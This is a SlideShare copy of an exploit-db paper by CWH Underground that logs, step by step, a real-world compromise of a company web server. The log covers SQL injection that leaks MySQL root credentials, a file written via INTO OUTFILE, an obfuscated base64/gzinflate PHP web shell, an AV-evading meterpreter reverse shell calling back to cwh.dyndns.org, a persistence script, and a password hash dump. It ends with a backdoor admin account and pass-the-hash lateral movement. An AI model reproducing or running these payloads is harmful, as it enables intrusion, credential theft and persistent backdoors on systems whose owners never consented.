Operation outbreak

2,370 views

Published on

Published in: Technology
0 Comments
0 Likes
Statistics
Notes
  • Be the first to comment

  • Be the first to like this

No Downloads
Views
Total views
2,370
On SlideShare
0
From Embeds
0
Number of Embeds
2
Actions
Shares
0
Downloads
8
Comments
0
Likes
0
Embeds 0
No embeds

No notes for slide

Operation outbreak

  1. 1. Vulnerability analysis, Security Papers, Exploit Tutorials http://www.exploit-db.com/papers/15833/ The Operation Outbreak Attack |=--------------------------------------------------------------------=| |=----------------=[ The Operation OutBreak Attack ]=-----------------=| |=--------------------------=[ 26 Dec 2010 ]=-------------------------=| |=----------------------=[ By CWH Underground ]=--------------------=| |=--------------------------------------------------------------------=| ###### Info ###### Title : The Operation OutBreak Attack Author : ZeQ3uL (Prathan Phongthiproek) Retool2 (Suttapong Wara-asawapati) Team : CWH Underground [http://www.exploit-db.com/author/?a=1275] Website : www.citecclub.org Date : 2010-12-26 ########## Contents ########## [0x00] - Introduction [0x01] - OutBreak Web Application [0x02] - OutBreak MySQL Database [0x03] - OutBreak with Autosploit.rc [0x04] - Outbreak to Internal Server [0x05] - References [0x06] - Greetz To ####################### [0x00] - Introduction ####################### Hi all, in this paper, we will show you my hacking method (Logs) from real world case study on some company. Moreover, we also show the ways to use the Best Exploitation tool, Metasploit Framework (Thank HD Moore and Rapid7) that powerful We recommend to read previous paper "The Operation Cloudburst Attack" that guide you about methods to hacking with Metaspl ################################### [0x01] - OutBreak Web Application ################################### First, I use nmap for scan open port on target and found information below [Nmap Result]----------------------------------------------------------------------------------- root@bt:~# nmap -sV -PN www.mbank.com Starting Nmap 5.35DC1 ( http://nmap.org ) at 2010-12-02 02:13 EST Nmap scan report for www.mbank.com Host is up (0.0070s latency). Not shown: 995 closed ports PORT STATE SERVICE VERSION 80/tcp open http Apache httpd 2.2.0 ((Win32) PHP/5.2.4) 3306/tcp open mysql MySQL (unauthorized) Service Info: OS: Windows Service detection performed. Please report any incorrect results at http://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 100.95 seconds [End Result]------------------------------------------------------------------------------------ From result, I can only access 2 ports (HTTP, MySQL). Next step i can guess phpinfo.php file that contain web server information (We need it for enumerate information to attack with next step) [Wget Result]----------------------------------------------------------------------------------- root@bt:~#wget www.mbank.com/phpinfo.php --2010-12-02 02:19:23-- http://www.mbank.com/phpinfo.php Connecting to www.mbank.com:80... connected. HTTP request sent, awaiting response... 200 OK Length: unspecified [text/html] Saving to: `phpinfo.php [ <=> ] 47,540 --.-K/s in 0.004s1 of 6 12/26/10 7:43 PM
  2. 2. Vulnerability analysis, Security Papers, Exploit Tutorials http://www.exploit-db.com/papers/15833/ 2010-12-02 02:19:23 (10.3 MB/s) - `phpinfo.php saved [47540] root@bt:~# more phpinfo.php | grep "DOCUMENT_ROOT" <tr><td class="e">DOCUMENT_ROOT </td><td class="v">D:/www/htdocs/ </td></tr><tr><td class="e">_SERVER["DOCUMENT_ROOT"]</td [End Result]------------------------------------------------------------------------------------ I read file phpinfo.php and knew that web root location is "D:/www/htdocs/" and Now find configuration file (confi In this real case study we found their location is www.mbank.com/include/config.php ,Next discover da entry point for atta I can attack target with this string "www.mbank.com/news.php?id=1 and 1=2 union select 1,2,3,4,5--" Normally we kn but its hard for nowadays because many database was encrypted information with MD5 or SALT+MD5 that harder for attacker to From phpinfo.php, We knew root directory path -> D:/www/htdocs/ From Configuration file, We knew that locate on -> www.mbank.com/include/config.php (D:/www/htdocs/include/config.php) I encode D:/www/htdocs/include/config.php to HEX -> 0x443a2f7777772f6874646f63732f696e636c7564652f636f6e6669672e706870 Then mapping with SQL Injection techniques -> http://www.mbank.com/news.php?id=1/**/AND/**/1=2/**/UNION/**/SELECT/ and look at source code with view source, I found database information like this; [View Source]----------------------------------------------------------------------------------- ........ <? $user="root"; $password="1qaz2wsx!@#$"; $database="mbank"; $localhost="localhost"; mysql_connect($localhost,$user,$password); @mysql_select_db($database) or die( "Unable to select database"); ?> ....... [End Result]------------------------------------------------------------------------------------ Now we got username and password for MySQL Database => root/1qaz2wsx!@#$ ################################## [0x02] - OutBreak MySQL Database ################################## I try to connect to MySQL/3306 with mysql client and its work (By default, root account cannot connect to this po If u cannot directly connect to MySQL/3306, U can find database path (/phpMyadmin or /phpmyadmin) for optional. [MySQL Log]----------------------------------------------------------------------------------- root@bt:~# mysql -u root -p1qaz2wsx!@#$ -h www.mbank.com -P 3306 Welcome to the MySQL monitor. Commands end with ; or g. Your MySQL connection id is 83 Server version: 5.0.24a-community-nt MySQL Community Edition (GPL) Type help; or h for help. Type c to clear the buffer. mysql> show databases; +--------------------+ | Database | +--------------------+ | information_schema | | mbank | | mysql | | smf | +--------------------+ 4 rows in set (0.00 sec) mysql> use mbank; Reading table information for completion of table and column names You can turn off this feature to get a quicker startup with -A Database changed mysql> CREATE TABLE GETSHELL (GETSHELL TEXT NOT NULL); Query OK, 0 rows affected (0.07 sec) mysql> INSERT INTO GETSHELL VALUES (<form method="post" action="" enctype="multipart/form-data"><input type="file" name=" Query OK, 1 row affected (0.00 sec) mysql> SELECT * FROM GETSHELL into outfile D:wwwhtdocsupload.php; Query OK, 1 row affected (0.00 sec) [End Result]------------------------------------------------------------------------------------ Now i can access www.mbank.com/upload.php for upload PHP shell (C99,R57,Etc) but many webserver installed antiviru2 of 6 12/26/10 7:43 PM
  3. 3. Vulnerability analysis, Security Papers, Exploit Tutorials http://www.exploit-db.com/papers/15833/ [Incop Shell]----------------------------------------------------------------------------------- <?eval(gzinflate(base64_decode(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 VuqpuJoWh/8xh/Ks2o8pMQc78oLFcSrhYro+n8=)));?> [End Result]------------------------------------------------------------------------------------ Save it as incop.php. When i upload this file, It change to shell.php (Depended on upload.php file that i created Now move to metasploit, I created exe payload from msfpayload to connect back to my server. ./msfpayload windows/meterpreter/reverse_https LHOST=cwh.dyndns.org LPORT=443 X > rev.exe We got rev.exe file that 100% SSL-encrypted. I tested, it can bypass these AV - Avast / Avast5 - AVG - ClamAV - eSafe - Fortinet - Kaspersky - McAfee / McAfee-GW-Edition - Nod32 - Symantec - TrendMicro - ETc Upload rev.exe to www.mbank.com with shell.php. ###################################### [0x03] - OutBreak with Autosploit.rc3 of 6 12/26/10 7:43 PM
  4. 4. Vulnerability analysis, Security Papers, Exploit Tutorials http://www.exploit-db.com/papers/15833/ ###################################### Next step, I use metasploit console waiting for connect back. I wrote autosploit.rc script for metasploit [autosploit.rc]----------------------------------------------------------------------------------- use exploit/multi/handler set PAYLOAD windows/meterpreter/reverse_https set LPORT 443 set LHOST cwh.dyndns.org set ExitOnSession false exploit -j <ruby> sleep(1) print_status("Waiting on an incoming sessions...") while (true) framework.sessions.each_pair do |sid,s| thost = s.tunnel_peer.split(":")[0] if s.ext.aliases[stdapi] sleep(1) print_status("Migrating to Explorer...") s.console.run_single("run migrate explorer.exe") print_status("Persistence to session #{sid} #{thost}...") s.console.run_single("run persistence -U -i 10 -p 443 -r cwh.dyndns.org") sleep(1) print_status("Closing session #{sid} #{thost}...") else print_status("Session #{sid} #{thost} active, but not yet configured") end end sleep(1) end print_status("All done") </ruby> [End Result]------------------------------------------------------------------------------------ Run this script with "msfconsole -r autosploit.rc" on my server (CWH.dyndns.org) [MSF Log]----------------------------------------------------------------------------------- root@bt:~# msfconsole -r autosploit.rc _ | | o _ _ _ _ _|_ __, , _ | | __ _|_ / |/ |/ | |/ | / | / _|/ _|/ / _| | | | |_/|__/|_/_/|_/ / |__/ |__/__/ |_/|_/ /| | =[ metasploit v3.6.0-dev [core:3.6 api:1.0] + -- --=[ 638 exploits - 314 auxiliary + -- --=[ 215 payloads - 27 encoders - 8 nops =[ svn r11405 updated today (2010.12.13) resource (autosploit.rc)> use exploit/multi/handler resource (autosploit.rc)> set PAYLOAD windows/meterpreter/reverse_https PAYLOAD => windows/meterpreter/reverse_https resource (autosploit.rc)> set LPORT 443 LPORT => 443 resource (autosploit.rc)> set LHOST cwh.dyndns.org LHOST => cwh.dyndns.org resource (autosploit.rc)> set ExitOnSession false ExitOnSession => false resource (autosploit.rc)> exploit -j [*] Exploit running as background job. [*] resource (autosploit.rc)> Ruby Code (599 bytes) [*] Started reverse handler on cwh.dyndns.org:443 [*] Server started. [*] Waiting on an incoming sessions... [End Result]------------------------------------------------------------------------------------ Next Step,we back to shell.php and run rev.exe for connect back to cwh.dyndns.org. My server will have log like th [MSF Log]----------------------------------------------------------------------------------- [*] Sending stage (749056 bytes) to 202.57.123.61 [*] Meterpreter session 1 opened (cwh.dyndns.org:443 -> 202.57.123.61:1150) at Mon Dec 13 06:26:02 -0500 2010 [*] Session 1 202.57.123.61 active, but not yet configured [*] Current server process: rev.exe (2312) [*] Spawning a explorer.exe host process4 of 6 12/26/10 7:43 PM
  5. 5. Vulnerability analysis, Security Papers, Exploit Tutorials http://www.exploit-db.com/papers/15833/ [*] Migrating into process ID 3240 [*] New server process: explorer.exe (3240) [*] Persistence to session 1 202.57.123.61... [*] Running Persistence Script [*] Resource file for cleanup created at /root/.msf3/logs/scripts/persistence/MBank-9V0YIKHGUQ_20101213.2605/MBank-9V0YIKH [*] Creating Payload=windows/meterpreter/reverse_https LHOST=cwh.dyndns.org LPORT=443 [*] Persistent agent script is 612403 bytes long [+] Persisten Script written to C:DOCUME~1ADMINI~1.BANLOCALS~1TempPXPAoEDWXHCQm.vbs [*] Executing script C:DOCUME~1ADMINI~1.BANLOCALS~1TempPXPAoEDWXHCQm.vbs [+] Agent executed with PID 2172 [*] Installing into autorun as HKCUSoftwareMicrosoftWindowsCurrentVersionRunpwDRjMUermyWOM [+] Installed into autorun as HKCUSoftwareMicrosoftWindowsCurrentVersionRunpwDRjMUermyWOM [End Result]------------------------------------------------------------------------------------ My autosploit script finished for upload backdoor to server with persistence techniques (Mbank will reverse connec ###################################### [0x04] - Outbreak to Internal Server ###################################### I enumerate information from target for attack internal server, First I use nmap for scan windows machine on subne that use the same username/password (adminit) and BINGO !! i can "Pass the Hash" on target 202.57.123.65 that use adminit: [Nmap]----------------------------------------------------------------------------------- msf exploit(handler) > nmap -v -sP 202.57.123.1/24 -p 139,445 Starting Nmap 5.21 ( http://nmap.org ) at 2010-12-13 00:09 ICT Initiating ARP Ping Scan at 00:09 Scanning 103 hosts [1 port/host] Completed ARP Ping Scan at 00:09, 1.28s elapsed (103 total hosts) Initiating Parallel DNS resolution of 103 hosts. at 00:09 Completed Parallel DNS resolution of 103 hosts. at 00:09, 0.02s elapsed ÉÉ Completed SYN Stealth Scan at 00:09, 0.01s elapsed (6 total ports) Nmap scan report for 202.57.123.62 Host is up (0.0045s latency). PORT STATE SERVICE 139/tcp open netbios-ssn 445/tcp open microsoft-ds MAC Address: 00:1D:7E:AE:44:A6 Nmap scan report for 202.57.123.65 Host is up (0.0044s latency). PORT STATE SERVICE 139/tcp open netbios-ssn 445/tcp open microsoft-ds É [End Result]------------------------------------------------------------------------------------ [Pass the Hash]----------------------------------------------------------------------------------- msf exploit(handler) >sessions -i 1 [*] Starting interaction with 1... meterpreter > hashdump Administrator:500:f0d412bd764ffe81aad3b435b51404ee:209c6174da490caeb422f3fa5a7ae634::: adminit:1009:4362b0c2c937be3caad3b435b51404ee:1ef810e357689082c9cd946f5c7c7468::: ASPNET:1007:a29f3377e4a58eb1107fc8633cfe562c:c6a7c566af537b816f001d0fea95199f::: Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0::: IUSR_MBANK-9V0YIKHGUQ:1004:3454d175ec02f1a94da8ede9bacc6fbb:1c297be0bfc17b7285746dc763fa834a::: IWAM_MBANK-9V0YIKHGUQ:1006:70246d502a449bb1e9139ddc3f21bf91:41852ceb10626856344e782c3bcbfc5b::: SUPPORT_388945a0rs:1001:aad3b435b51404eeaad3b435b51404ee:35dbf71c3861f3f6338ae1b54ac20a70::: meterpreter > shell Process 2564 created. Channel 1 created. Microsoft Windows [Version 5.2.3790] (C) Copyright 1985-2003 Microsoft Corp. D:wwwhtdocs>net user cwh 1234 /add net user cwh 1234 /add The command completed successfully. D:wwwhtdocs>net localgroup administrators cwh /add net localgroup administrators cwh /add The command completed successfully. D:wwwhtdocs>exit meterpreter > Background session 1? [y/N]y msf exploit(handler) >use exploit/windows/smb/psexec msf exploit(psexec) > set RHOST 202.57.123.655 of 6 12/26/10 7:43 PM
  6. 6. Vulnerability analysis, Security Papers, Exploit Tutorials http://www.exploit-db.com/papers/15833/ RHOST => 202.57.123.65 msf exploit(psexec) > set SMBUser adminit SMBUser => adminit msf exploit(psexec) > set SMBPass 4362b0c2c937be3caad3b435b51404ee:1ef810e357689082c9cd946f5c7c7468 SMBPass => 4362b0c2c937be3caad3b435b51404ee:1ef810e357689082c9cd946f5c7c7468 msf exploit(psexec) > set PAYLOAD windows/meterpreter/bind_tcp PAYLOAD => windows/meterpreter/bind_tcp msf exploit(psexec) > exploit [*] Started bind handler [*] Connecting to the server Authenticating as user adminit [*] Uploading payload [*] Created wRAGxeKp.exe [*] Binding to 367abb81-9844-35f1-ad32-98f038001003:2.0@ncacn_np:202.57.123.65[svcctl] ... [*] Bound to 367abb81-9844-35f1-ad32-98f038001003:2.0@ncacn_np:202.57.123.65[svcctl] ... [*] Obtaining a service manager handle [*] Creating a new service (bbULKlnn - "Mn0aWrz") [*] Closing service handle [*] Opening service [*] Starting the service [*] Removing the service [*] Closing service handle [*] Deleting wRAGxeKp.exe [*] Sending stage (748032 bytes) to 202.57.123.65 [*] Meterpreter session 2 opened (202.57.123.61:55640 -> 202.57.123.65:4444) at Mon Dec 13 07:10:32 -0500 2010 meterpreter > [End Result]------------------------------------------------------------------------------------ From above, Its hard to control system coz I can control only from msfconsole or phpshell. So I go to phpshell and type command "netstat -an" for view open port on www.mbank.com. i found this server opened Remote meterpreter > portfwd add -l 3389 -p 3389 -r 127.0.0.1 Next, I can use rdesktop to connect to www.mbank.com server with this command. root@bt:~#rdesktop -u cwh -p 1234 localhost Now we can fully compromised www.mbank.com with remote desktop and can use this machine to remote desktop to inter Enjoy !! and Merry X Mas ##################### [0x05] - References ##################### [1] http://blog.metasploit.com/ [2] Metasploit Unleashed #################### [0x06] - Greetz To #################### Greetz : ZeQ3uL, JabAv0C, p3lo, Sh0ck, BAD $ectors, Snapter, Conan, Win7dos, Gdiupo, GnuKDE, JK, Retool2 Special Thx : asylu3, citecclub.org, exploit-db.com ---------------------------------------------------- This paper is written for Educational purpose only. The authors are not responsible for any damage originating from using this paper in wrong objective. If you want to use this knowledge with other person systems, you must request for consent from system owner before ---------------------------------------------------- © Offensive Security 20106 of 6 12/26/10 7:43 PM

×